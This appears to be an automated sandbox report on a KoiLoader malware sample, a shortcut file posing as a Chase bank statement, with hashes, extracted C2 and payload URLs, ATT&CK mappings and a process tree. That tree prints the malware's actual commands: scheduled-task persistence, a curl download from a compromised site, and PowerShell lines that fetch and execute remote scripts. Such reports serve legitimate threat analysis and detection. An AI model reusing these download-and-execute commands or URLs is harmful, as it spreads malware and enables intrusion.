koiloader | ec5eef03fe07efe2ca6ed4aa1a68f52cdae2043bdf7b5433dd946bacfb581e97

General

Target

chase_14_06_24_statement.lnk
Size

2KB
MD5

6e46db2bb323d9c90717bc4acede81e1
SHA1

506fb29a25eb35a590eec152c260d783719a85f1
SHA256

95ebb135bedca3d8bc005af49079cc5399ac795aec0df21d0477ccd716d14882
SHA512

eb0e6a6b5b5a15a88c9fe3e8cebbf58617addc8604eb5e2923e78a24407df860f08ecae892b60f2ea8a340211b2474f8d1eb5f28d378cba046693222eaf73083

Score

10^/10

koiloader execution loader

Malware Config

Extracted

Family

koiloader

C2

http://176.10.111.71/guapen.php

Attributes

payload_url
https://schermarieti.it/wp-content/uploads/2019/09

Signatures

KoiLoader
KoiLoader is a malware loader written in C++.
loader koiloader

Detects KoiLoader payload 1 IoCs

loader

Processes:

resource	yara_rule
behavioral2/memory/3996-39-0x0000000007B90000-0x0000000007B9D000-memory.dmp	family_koi_loader

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

43 3264 powershell.exe
44 3996 powershell.exe

flow	pid	process
43	3264	powershell.exe
44	3996	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exewscript.EXEwscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	wscript.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3996 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

4760 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3264 powershell.exe
3264 powershell.exe
3996 powershell.exe
3996 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3264 powershell.exe
Token: SeDebugPrivilege 3996 powershell.exe

pid	process
3996	powershell.exe

pid	process
4760	schtasks.exe

pid	process
3264	powershell.exe
3264	powershell.exe
3996	powershell.exe
3996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exewscript.EXEpowershell.exewscript.exe

description	pid	process	target process
PID 1412 wrote to memory of 3620	1412	cmd.exe	cmd.exe
PID 1412 wrote to memory of 3620	1412	cmd.exe	cmd.exe
PID 3620 wrote to memory of 4760	3620	cmd.exe	schtasks.exe
PID 3620 wrote to memory of 4760	3620	cmd.exe	schtasks.exe
PID 3620 wrote to memory of 2612	3620	cmd.exe	curl.exe
PID 3620 wrote to memory of 2612	3620	cmd.exe	curl.exe
PID 1808 wrote to memory of 3264	1808	wscript.EXE	powershell.exe
PID 1808 wrote to memory of 3264	1808	wscript.EXE	powershell.exe
PID 3264 wrote to memory of 2368	3264	powershell.exe	schtasks.exe
PID 3264 wrote to memory of 2368	3264	powershell.exe	schtasks.exe
PID 3264 wrote to memory of 3200	3264	powershell.exe	wscript.exe
PID 3264 wrote to memory of 3200	3264	powershell.exe	wscript.exe
PID 3200 wrote to memory of 3996	3200	wscript.exe	powershell.exe
PID 3200 wrote to memory of 3996	3200	wscript.exe	powershell.exe
PID 3200 wrote to memory of 3996	3200	wscript.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_14_06_24_statement.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ" & curl -s -o U43kOF8PhQeq.js -v "https://schermarieti.it/wp-content/uploads/2019/09/incarcerative7iEA.php"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4760
- - C:\Windows\system32\curl.exe
    curl -s -o U43kOF8PhQeq.js -v "https://schermarieti.it/wp-content/uploads/2019/09/incarcerative7iEA.php"
    3⤵
    PID:2612

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -com "IWR -useb 'https://schermarieti.it/wp-content/uploads/2019/09/bitteredXD3.php' -outf $env:tmp\9MP4IOZ4SEWR.js; schtasks /delete /tn i1YsdL7m9k4xOoZ /f; wscript $env:tmp\9MP4IOZ4SEWR.js "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3264
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /delete /tn i1YsdL7m9k4xOoZ /f
    3⤵
    PID:2368
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\9MP4IOZ4SEWR.js
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7z0QIO9ITCMD'; IEX(IWR -UseBasicParsing 'https://schermarieti.it/wp-content/uploads/2019/09/eriocomiXQ.ps1'); $ff.SetValue($null, 'NCyJQuuZNa9qj7C2LWi5B3o80AH61I5JkydiGE4PrO4Se'.Contains('Wi5B3o80')); IEX(IWR -UseBasicParsing 'https://schermarieti.it/wp-content/uploads/2019/09/zietrisikiteFtK.ps1')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\9MP4IOZ4SEWR.js

Filesize
1KB

MD5
99aacfbcf4727114fc887122f5a5c804

SHA1
d8c8ee293e8fcec8583a5a1a143e439e7969a102

SHA256
e3cf143dc67fe548e8c2fc95b723d43e704808a4ee35635a30631f6dbe25db82

SHA512
94792e1a79f07d041ca3ea562f04aef20567a3c46bd8d2e21c64057cd5adf5cdf8035a894d5e25eef6f0c22acf1aafb4a1a08d07f22910c6e206441aa1f1a312

Download Submit
C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js

Filesize
278B

MD5
90bd896fed73c9f099f5665a7726f074

SHA1
57b9031e316d47fdf7d5a64d0a6fc49b329c0d69

SHA256
46defbba13543653ce04f47d150aa9162fb344575056c632dc907ae1ae3b10e6

SHA512
13c0ef9f1e24477eb4a61345aceaf8176cbe929f50a32150ed8a4a3296df4d2fc4886b23e59a182130fd3dd4163d826272a9ddd3cf8627c9bec0c063eb665281

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cy3rjavv.mxc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3264-11-0x000001ED2D970000-0x000001ED2D992000-memory.dmp

Filesize
136KB

Download
memory/3996-21-0x0000000005870000-0x00000000058D6000-memory.dmp

Filesize
408KB

Download
memory/3996-19-0x00000000053E0000-0x0000000005402000-memory.dmp

Filesize
136KB

Download
memory/3996-20-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download
memory/3996-18-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/3996-31-0x00000000060C0000-0x0000000006414000-memory.dmp

Filesize
3.3MB

Download
memory/3996-17-0x0000000002ED0000-0x0000000002F06000-memory.dmp

Filesize
216KB

Download
memory/3996-33-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/3996-34-0x00000000064D0000-0x000000000651C000-memory.dmp

Filesize
304KB

Download
memory/3996-35-0x0000000007CE0000-0x000000000835A000-memory.dmp

Filesize
6.5MB

Download
memory/3996-36-0x00000000069F0000-0x0000000006A0A000-memory.dmp

Filesize
104KB

Download
memory/3996-37-0x0000000007B70000-0x0000000007B71000-memory.dmp

Filesize
4KB

Download
memory/3996-39-0x0000000007B90000-0x0000000007B9D000-memory.dmp

Filesize
52KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads